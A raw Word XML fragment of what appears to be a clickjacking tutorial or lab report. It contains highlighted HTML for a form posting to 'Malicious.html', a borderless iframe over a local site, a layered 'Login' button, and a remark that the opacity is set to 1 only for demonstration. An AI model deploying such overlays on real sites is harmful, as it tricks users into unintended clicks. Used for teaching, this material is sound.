                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">;         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>z-index</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="B5CEA8"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23EA590E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="4"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">    } </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70672501" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>style</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40039D09" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>body</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65AC3DE8"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form</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>action</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"Malicious.html"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BCFCCBE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="4"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>iframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"http://127.0.0.1:8000/"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>frameborder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"0"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>scrolling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"no"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>iframe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DEE583D"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input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"submit"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"Login"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="9CDCFE"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="CE9178"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>"submit"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BBBCD04"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form</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB4D66A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"/>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script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A9270AF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="4"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF9AAB0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>body</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B15F5DB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="52"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="569CD6"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="808080"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4485BD2E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="33"/>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="333332"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B779D5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="3975" w:line="239" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">As I have given the opacity of button to be 1 for demonstration purpose to let us know where the button will be placed and how it will look like </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EC9BE56" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="49"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">31 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C97E0E7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B29B9B7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="38"/>
        <w:ind w:left="40" w:right="-777"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3105A825" wp14:editId="411067D0">
                <wp:extent cx="5960974" cy="3752873"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="43518" name="Group 43518"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5960974" cy="3752873"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5960974" cy="3752873"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="4376" name="Rectangle 4376"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3236388"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="262C156F"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4377" name="Rectangle 4377"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431546" y="3400980"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="00CDCE49"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4378" name="Rectangle 4378"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431546" y="3603672"/>
                            <a:ext cx="3734195" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="36CDDE29" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>For the user how the website will look like</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="4379" name="Rectangle 4379"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3242437" y="3603672"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="66D9EE29"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99"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="4391" name="Shape 4391"/>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5A825" id="Group 43518" o:spid="_x0000_s1298" style="width:469.35pt;height:295.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59609,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SMBcUgQAAJ0PAAAOAAAAZHJzL2Uyb0RvYy54bWzkV21v2zYQ/j5g&#10;/0HQ98Z6sWxLiFMMzRoUGNag7X4ALVOWMIokSPptv353R1F2E3fJMqAZtgCRKfJ4vHuOp3vu+u2h&#10;F9GOG9spuYzTqySOuKzVupObZfzbl/dvFnFkHZNrJpTky/jIbfz25scfrve64plqlVhzE4ESaau9&#10;Xsatc7qaTGzd8p7ZK6W5hMVGmZ45eDWbydqwPWjvxSRLktlkr8xaG1Vza2H21i/GN6S/aXjtPjaN&#10;5S4Syxhsc/Q09Fzhc3JzzaqNYbrt6sEM9gIretZJOHRUdcsci7ame6Sq72qjrGrcVa36iWqarubk&#10;A3iTJg+8uTNqq8mXTbXf6BEmgPYBTi9WW/+6uzP6s743gMRebwALekNfDo3p8ResjA4E2XGEjB9c&#10;VMNkUc6Scj6NoxrW8nmRLea5B7VuAflH++r25yd2TsLBk6/M2Wu4IPaEgf1nGHxumeYEra0Ag3sT&#10;detlPM3nsziSrIeb+gnuDpMbwSOaJXhIdgTLVhZwu4BUUaZlloImxCTLZ/li4TEZUSuKHBIDMUvL&#10;xTSf4fLoOKu0se6Oqz7CwTI2YArdLrb7xTovGkTweCHxKdX7Tgi/ijOAX7AQR+6wOpCTaZ7icTi3&#10;UusjuN4q88dHSOJGqP0yVsMoxryG03E1jsQHCZBjCoWBCYNVGBgn3ilKNG/PT1unmo4MPp02GAax&#10;9DZ8j6DOLwZ1HmCAC/B0UKd5WkyHmE6TpFwMH49/SUyz4Mz/JaaQPxcSlRINL9vfjuksyWdzQpFV&#10;Iab5PJ+mZfF6mUrf0lPu/PcztbwY1TJc7mdFNc+mGXyz/ef3UliL1/38ToM3r52quqsr+B94BYwe&#10;1dSn+RfsclvD40FJ/ywdPTO/b/UboECauW7Vic4dic5BlUOj5O6+q7G04st5eS6hAPmsBwE8F4oz&#10;zEE5C5K4D2sgvn+lZiU6jQUSSxOOB4OBCz7gUhd89jztVtXbnkvniafhAmxX0radtnFkKt6vOHAI&#10;82FN9ZVV1hnu6hYPbOBgJBS+O